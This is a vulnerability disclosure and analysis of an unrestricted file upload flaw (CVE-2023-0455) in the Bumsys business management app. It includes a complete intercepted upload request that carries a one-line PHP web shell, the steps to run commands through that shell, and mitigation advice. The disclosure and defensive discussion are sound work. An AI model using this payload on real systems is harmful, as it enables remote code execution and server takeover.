unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
Exploit Title: unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455
================================
Steps to Reproduce
================================
- Navigate to this URL: https://demo.bumsys.org/settings/shop-list/
- Click the action button to edit the profile
- Click the select-logo button to upload the image
- Intercept the POST request and make the changes shown below.
================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"
TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"
test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"
testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"
teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"
700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"
testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"
895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"
test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png
<?php echo system($_REQUEST['dx']); ?>
====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65
<div class='alert alert-success'>Shop successfully updated.</div>
====================================================================================
VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Unilogies/Bumsys v1.0.3-beta: Unrestricted File Upload Vulnerability Exploited via PHP Shell Upload

On January 19, 2023, cybersecurity researcher AFFAN AHMED disclosed a critical vulnerability in Unilogies/Bumsys v1.0.3-beta, a web-based business management system hosted on GitHub. The flaw, designated CVE-2023-0455, enables unrestricted file uploads: specifically, it allows attackers to upload malicious PHP scripts declared as image files. This vulnerability presents a severe risk to any deployment of the software, especially in environments where default security measures are not enforced.
Understanding the Vulnerability
The core issue lies in the file upload mechanism for the shop logo in the Settings → Shop List module. The application accepts file uploads without proper validation of file type, extension, or content. Attackers can exploit this by uploading a PHP file (e.g., profile picture.php) while declaring an image Content-Type such as image/png, which satisfies a check that trusts only the client-supplied MIME type.
When the upload is intercepted with a tool like Burp Suite, the request can be modified to include executable PHP code, as demonstrated by the shopLogo part of the request shown above.
That one-line snippet is a minimal web shell that executes system commands passed through the dx parameter. For instance, sending dx=whoami would return the current user identity on the server. This capability allows remote code execution (RCE), effectively giving attackers full control over the underlying server environment.
Attack Scenario: Step-by-Step Exploitation
Exploitation follows a predictable sequence:
- Target Access: Navigate to https://demo.bumsys.org/settings/shop-list/.
- Trigger Upload: Click the "Edit Profile" action button and select the "Select Logo" option.
- Intercept Request: Use Burp Suite to capture the POST request to /xhr/?module=settings&page=updateShop.
- Modify Payload: Change the filename from a PNG to profile picture.php and inject the PHP shell code.
- Send Request: Forward the modified request. The server accepts it due to lack of file validation.
- Execute Command: Access the uploaded file via https://demo.bumsys.org/uploads/profile picture.php?dx=ls to list directory contents.
Why This is a Critical Risk
Unrestricted file uploads are among the most dangerous vulnerabilities in web applications. They enable:
- Remote Code Execution (RCE): As demonstrated, attackers can execute arbitrary commands on the server.
- Privilege Escalation: If the web server runs under a privileged user (e.g., root), attackers can gain full system access.
- Backdoor Persistence: Malicious files can be uploaded and maintained indefinitely, allowing long-term access.
- Data Exfiltration: Attackers can read sensitive files (e.g., database credentials, configuration files).
Even in demo environments like demo.bumsys.org, this vulnerability exposes the underlying infrastructure to real-world threats. A production deployment without proper security hardening would be highly susceptible to compromise.
Technical Analysis: Burp Suite Request Breakdown
| Header | Value |
|---|---|
| Content-Type | multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA |
| X-Csrf-Token | 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 |
| Cookie | eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 |
| Origin | https://demo.bumsys.org |

The Content-Type header indicates multipart form data, which is standard for file uploads. However, the absence of file extension validation and content inspection allows malicious payloads to be processed. The X-Csrf-Token and Cookie headers show that the request is made from an authenticated session, so the flaw is reachable by any logged-in user who can edit a shop profile; session handling and CSRF protection do nothing to stop such a user from uploading a script if the upload mechanism itself is unprotected.
Security Recommendations & Mitigations
To prevent such vulnerabilities, developers and administrators must implement the following security controls:
- File Type Validation: Restrict uploads to specific MIME types (e.g., image/png, image/jpeg), determined from the file's content rather than from the client-supplied Content-Type header, which the request above shows is attacker-controlled, and reject any file with .php, .js, or other executable extensions.
- File Content Inspection: Scan uploaded files for known malicious patterns (e.g., php, exec, system).
- Upload Directory Permissions: Store uploaded files outside the web root or in a directory with noexec permissions, and configure the web server not to execute scripts from that directory, since a noexec mount by itself does not stop the PHP module from interpreting a .php file.
- Use of Safe File Extensions: Rename uploaded files using random identifiers (e.g., upload_12345.png) to avoid predictable paths.
- Server-Side File Processing: Avoid allowing direct execution of uploaded files. Use a dedicated processing layer instead.
Real-World Implications
Unilogies/Bumsys is a lightweight business management tool intended for small enterprises. Its open-source nature makes it attractive for quick deployment, but also exposes it to misuse. A compromised instance could lead to:
- Loss of customer data (e.g., invoices, contact info).
- Unauthorized financial transactions.
- Malware propagation across internal networks.
- Server hijacking for cryptocurrency mining or botnet recruitment.
Given that this vulnerability was tested on XAMPP 8.2.0 on Windows 11, it underscores that even local development environments are not immune. Developers should treat all file upload features as high-risk components.
Conclusion
While Unilogies/Bumsys v1.0.3-beta may serve as a useful prototype, its CVE-2023-0455 flaw highlights a fundamental failure in secure coding practices. Unrestricted file uploads, especially with PHP script injection, represent a classic yet devastating attack vector. This case serves as a cautionary tale: never trust user input, especially when it comes to file uploads.